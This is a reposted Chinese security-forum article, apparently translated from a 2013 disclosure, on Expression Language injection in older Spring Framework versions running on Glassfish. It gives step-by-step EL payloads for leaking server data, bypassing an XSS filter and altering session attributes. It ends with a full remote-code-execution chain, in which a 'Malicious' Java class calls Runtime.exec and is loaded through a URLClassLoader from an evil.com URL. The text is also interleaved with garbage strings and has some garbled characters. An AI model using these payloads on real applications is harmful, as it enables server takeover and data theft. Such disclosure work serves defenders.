中国网络渗透测试联盟
标题:
spring-远程代码注入
[打印本页]
作者:
admin
时间:
2013-2-16 21:47
标题:
spring-远程代码注入
Remote Code with
4 O/ f0 l/ i$ M T2 n5 T
Expression Language Injection
7 B. z c4 }+ P
Spring Framework脆弱性—DanAmodio
2 K& n4 p9 u4 d4 A2 `1 Z: h
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
9 y t$ i$ _8 R! b# m A
可能会存在风险。
$ Z. S4 _0 g6 p2 C/ }( f$ p5 w
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
" O. T5 P& x. o' P% q
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
$ s% `, d7 ^% M9 T1 L2 V, g2 d, |
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
; n/ ?6 V* t d; G. D+ g
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
; n3 L4 e* O& J6 m) r5 E& s! Z
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
2 L2 _5 s0 k5 H
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
6 c! F6 _; c7 V& U
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
* z; k$ I" x/ h5 X4 o: C m2 w: v
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
' q! ~* a! q% A; V& q* ^% O2 x/ O1 Q
这些版本不支持禁用double EL resolution.
$ _# k3 {; @9 Z }' t( o3 W
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
3 D& \0 h! J$ [; ^6 \" W5 n; Z
EL2.2容器上可能进行远程代码执行。
# Y0 Q) y! r+ Y1 C# e6 d8 C! e( E
这是一个原始信息泄露的攻击例子:
; g5 ~5 l6 S, {
请求:
- Q" j: y$ J3 M
ttp://vulnerable.com/foo?message=${applicationScope}
9 i4 H9 Q5 d7 f7 @2 F" }! s9 t
到达以下内容页面:
3 Z! h1 D5 j6 |6 F
结果将输出一些包含内部服务器信息calsspath 和本地工作目录
: T8 }; h- R B1 A* t+ S
你也可以做一些其他事情,如这样:
2 u1 F0 X. |* c2 c
${9999+1}
7 K, N2 `/ `* ?7 t/ Y
还可以访问session 对象和beans
& W5 k2 B: P0 D' J
${employee.lastName}
9 S1 X+ @: S! P8 L5 U) ]
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
+ B! q3 v6 Y$ ^; r& ]) N4 R! C1 F% n
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
' K3 N- q5 \4 j1 b
西,比如XSS.
9 |7 b8 }2 e+ |* U- R6 n) t5 |
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
6 l7 _# d1 H7 I2 G. G: `
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
+ F+ H/ h9 I/ |! |" v+ W/ i- D
呢?”
$ \6 H; z( t2 @( |" [) B
因此,我尝试巳缦拢�
- c& Z' M3 S6 D6 n& W" D0 J0 D
http://vulnerable.com/app?code=
${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
$ }, d9 R" V3 J' s' @3 [1 s+ l
P
) |2 Q3 g0 ^) q9 |& q- c
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
. R- Y3 ?: \1 o i4 {$ n9 |1 M: u" V
回的文本被插入进了spring:message 标签。
6 t+ v$ W; D- g& c; v6 u
这里是一个最终绕过过滤的实例:
X4 K4 C, U8 }. R
http://vulnerable.com/app?code=
${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1)
/scriptQ
; b S# ]+ G, L! _, ~
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
' M S1 ]$ F. u8 F0 g
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
0 R& V4 i5 K0 T1 K
经过一番研究,我学习到EL2.2 增加了方法调用。
8 @$ h2 ], n2 Z# [: f
我写了一个快速测试应用程序代码并且检测一些功能
9 M! h! j2 Q! h% a1 X& j
${pageContext.request.getSession().setAttribute(“account”,”123456″)}
7 W, `" a5 s% s: l/ y# A
${pageContext.request.getSession().setAttribute(“admin”,true)}
% L- B. H _, i
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
0 r* _) B) ^8 H0 D1 {5 V
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
/ p- N9 k2 D- H+ I& o
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
6 v e/ ?+ {* q& L3 | O
“, 1234)}
" Q2 ?! Q0 n+ _, Z' {
${“”.getClass().forName(“java.lang.Runtime”)}
% F/ O. W5 g. V( B
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
0 p2 x& \& m+ v# Z- [
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
. `# H' h& n9 P# q% F
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
& Y) h3 t4 O" c
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
& Y; C; ~5 U; e. a3 ?
方法签名invoke(Object obj, Object„ args)
. K( J2 j% N7 ]! ^
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
2 J4 U& Y' g L1 |' b) L) H
题,以让它可以工作起来。
% r6 }; Q0 j( w, o$ K
漏洞利用:
9 o: w. ~! [# |4 a9 H# s
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
: g3 s4 I0 m% X$ ?0 s% O
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
$ l, A; [* k! P& J3 {
这里有一些我试过的失败的用例,为了试图让它工作的用例:
6 X+ e& @, P. y( @7 a8 I
写文件到文件系统
% c: ]1 [) b' x, k+ p
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
* m3 X1 _/ e; y; g l1 A! a
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
0 g/ q6 g x$ B+ X* h d0 C
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
1 _, \" i) S) m
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
' z" Z1 [: o3 F% t
org.springframework.expression.spel.standard.SpelExpressionParser not found
2 A4 V/ W# ?" k) |4 i) D
by
# N' u0 q: l6 g7 V8 n8 q
org.glassfish.web.javax.servlet.jsp [194].
) A4 O9 u( r1 g, z& o$ j2 l
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
! k8 L% L/ }. l) r0 S5 w9 V$ A
利用反射来创建一个新的Runtime(and watch the world burn)
9 a' F- i7 L& s7 @
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
& o/ z& ?2 c: T( F; ]
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
0 V k8 `4 C; ? C" ~1 b
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
; G/ t6 F+ n: b5 H& e
使用java.lang.ProcessBuilder
- u: g4 H7 g. R- b& q& U1 M* X# K
用表达式语言来评估表达式语言
* o5 P% s& P5 ~) x
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
: i/ \7 s2 r1 L% n; f( j
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
3 K9 ^+ P x' y+ `8 ?) B
“,”".getClass(),null)}
% N, m E9 u- j% q8 B4 A
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
. ?( H: x% J3 R' Z) a
我在使用一个空数组通过Method.invoke()时失败了很多次
9 S6 b5 i9 v( [" I l* d# a
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
; _, c# L( j- w$ O, t
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
9 p, a0 K) R/ p$ h. K
rrayList”).newInstance().toArray())
! _2 \6 ^- \- H
java.lang.IllegalArgumentException: wrong number of arguments
! @( W v* q9 M% `6 w8 O1 y
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
& ?% A1 ?1 i+ V4 a2 P
以创建一个恶意class文件并且指向类装载器.
! P5 T. K2 n: K6 ?
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
' p9 B% l. [9 F3 F8 G
public class Malicious {
" a) ^, Y) `" `
public Malicious() {
. t' F# Y( @8 y7 e7 A# v2 z$ \
try {
$ P0 ?" q2 v) J% u) t6 k: a" f
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
3 c+ S9 D H# Q8 s P
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
& P- ~8 @: M& s+ y
} catch (Exception e) {
9 s/ _# A G5 s' K
}
! V1 \8 ]. F0 D! M
}
" c7 \8 n* Y' F0 L, U% Z2 e4 z
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
+ h% n# u& ~2 k: i* N6 [
话中,因此它可以被使用.
+ d% R) h2 t. c1 P8 o. W
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
* Y/ ~7 J9 p# d
(“java.util.ArrayList”).newInstance())}
% |1 s# C' j7 J0 r3 d U) S6 ^
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
" \- G# S3 x6 }, Y/ k+ g$ s
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
6 O0 ^; s" ~3 Y2 t; q
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
7 d; W) ` F% N, M/ O/ [, [
我们可以调用的create(string)方法,然后转换对一个URL对象。
( ?: c. l" H0 d9 X
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“
http://evil.com/path/to/wh
' z3 K' b3 P6 l0 T( s
ere/malicious/classfile/is/located/”).toURL())}
, {2 w8 _7 R* q8 F$ i& I
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
) u& u6 z5 R$ y3 ~+ g
恶意类文件被装载并创建,触发远程代码.
6 U- c$ i8 |' }# Y: L
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
4 ~" b) |4 V; U; p; d
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
4 d! S6 ?1 {2 C( v/ V- A
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
# s8 @8 }( J0 Z: z% X m, G+ u
()}
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2
/scriptQ